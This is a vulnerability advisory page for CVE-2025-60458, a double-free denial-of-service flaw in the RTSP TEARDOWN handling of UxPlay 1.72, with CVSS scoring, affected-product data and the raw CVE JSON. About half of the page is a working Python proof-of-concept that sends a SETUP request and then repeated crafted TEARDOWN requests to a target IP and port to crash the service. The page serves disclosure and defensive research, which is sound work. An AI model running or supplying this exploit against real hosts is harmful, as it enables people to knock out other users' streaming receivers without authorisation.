Security Vulnerability Report
中文
CVE-2025-60458 CVSS 6.5 MEDIUM

CVE-2025-60458

Published: 2025-12-29 15:16:02
Last Modified: 2026-01-09 21:58:05

Description

UxPlay 1.72 contains a double free vulnerability in its RTSP request handling. A specially crafted RTSP TEARDOWN request can trigger multiple calls to free() on the same memory address, potentially causing a Denial of Service.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:antimof:uxplay:1.72:*:*:*:*:*:*:* - VULNERABLE
UxPlay < 1.72
UxPlay 1.72(确认受影响)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 """ CVE-2025-60458 PoC - UxPlay Double Free in RTSP TEARDOWN This PoC demonstrates the double free vulnerability in UxPlay 1.72 """ import socket import sys def send_rtsp_teardown(target_ip, target_port=7000): """Send malicious RTSP TEARDOWN request to trigger double free""" # Craft a RTSP SETUP request first to establish session setup_request = ( "SETUP rtsp://{}/streamid=0 RTSP/1.0\r\n" "CSeq: 1\r\n" "Transport: RTP/AVP;unicast;client_port=8000-8001\r\n" "User-Agent: AirPlay PoC Client\r\n" "\r\n" ).format(target_ip) # Craft malicious TEARDOWN request that triggers double free teardown_request = ( "TEARDOWN rtsp://{}/streamid=0 RTSP/1.0\r\n" "CSeq: 2\r\n" "Session: MALICIOUS_SESSION_ID\r\n" "User-Agent: AirPlay PoC Client\r\n" "\r\n" ).format(target_ip) try: sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.settimeout(10) sock.connect((target_ip, target_port)) print(f"[*] Sending SETUP request to establish session...") sock.send(setup_request.encode()) response = sock.recv(4096) print(f"[*] Received response: {response.decode()[:200]}...") print(f"[*] Sending malicious TEARDOWN request...") # Send multiple TEARDOWN requests to increase chance of triggering double free for i in range(3): sock.send(teardown_request.encode()) print(f"[*] TEARDOWN request {i+1} sent") response = sock.recv(4096) print(f"[*] Received final response: {response.decode()[:200]}...") sock.close() print("[+] PoC execution completed") except socket.timeout: print("[-] Connection timeout - target may be vulnerable and crashed") except socket.error as e: print(f"[-] Socket error: {e} - target may have crashed") except Exception as e: print(f"[-] Error: {e}") if __name__ == "__main__": if len(sys.argv) < 2: print(f"Usage: {sys.argv[0]} <target_ip> [port]") sys.exit(1) target = sys.argv[1] port = int(sys.argv[2]) if len(sys.argv) > 2 else 7000 print(f"[*] Target: {target}:{port}") print(f"[*] Exploiting CVE-2025-60458: UxPlay Double Free\n") send_rtsp_teardown(target, port)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-60458", "sourceIdentifier": "[email protected]", "published": "2025-12-29T15:16:01.520", "lastModified": "2026-01-09T21:58:05.090", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "UxPlay 1.72 contains a double free vulnerability in its RTSP request handling. A specially crafted RTSP TEARDOWN request can trigger multiple calls to free() on the same memory address, potentially causing a Denial of Service."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-400"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:antimof:uxplay:1.72:*:*:*:*:*:*:*", "matchCriteriaId": "E0374085-93A4-4EEF-BFC6-BB16919E7C2A"}]}]}], "references": [{"url": "https://github.com/0pepsi/CVE-2025-60458", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}